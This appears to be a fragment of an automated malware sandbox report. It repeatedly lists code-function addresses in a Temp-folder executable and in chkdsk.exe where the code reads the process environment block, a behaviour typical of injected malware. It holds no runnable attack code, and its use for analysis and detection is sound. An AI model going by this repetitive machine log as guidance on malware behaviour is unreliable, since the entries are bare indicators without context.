          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01673D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01673D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01673D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01673D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01673D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01673D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0166AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016EA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01718DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0167D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0167D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0172FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0172FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0172FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0172FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016E6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016E6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016E6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016E6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016E6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016E6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016935A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01691DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01691DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01691DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_017305AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_017305AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01692581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01692581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01692581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01692581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01662D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01662D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01662D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01662D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01662D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01722D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01722D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01722D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01722D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01722D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01722D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01722D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0169FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0169FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0169AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0169AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0169AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0169AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0169AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0169AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0169AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0169AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0169AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0169AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0169AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0169A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016FC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016FC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0169BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016E6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016E6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016E6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016E6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01721C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01721C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01721C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01721C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01721C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01721C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01721C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01721C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01721C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01721C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01721C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01721C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01721C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01721C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0173740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0173740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0173740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_017214FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016E6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016E6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016E6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01738CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01724496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01724496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01724496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01724496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01724496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01724496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01724496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01724496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01724496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01724496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01724496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01724496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01724496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0167849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0167FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01738F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0167EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01664F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01664F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168B73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168B73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0169E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0169A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0169A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0173070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0173070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016FFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016FFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016A37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01678794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016E7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016E7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016E7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0167766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01677E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01677E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01677E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01677E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01677E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01677E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0172AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0172AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0166E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0171FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0166C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0166C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0166C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01698E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0169A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0169A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01721608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016776E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016916E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01738ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016936CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016A8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0171FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016E46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01730EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01730EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01730EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016FFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05433540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053E4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053E4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053E4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05463D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053BAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053DC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053DC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053D7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0543A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05488D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053F3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0547E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05436DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05436DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05436DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05436DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05436DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05436DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053E1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053E1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053E1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053E35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053EFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053EFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0547FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0547FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0547FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0547FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053B2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053B2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053B2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053B2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053B2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05468DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053E2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053E2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053E2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053E2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053CD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053CD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_054805AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_054805AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053EBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0544C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0544C450 mov eax, dword ptr fs:[00000030h]
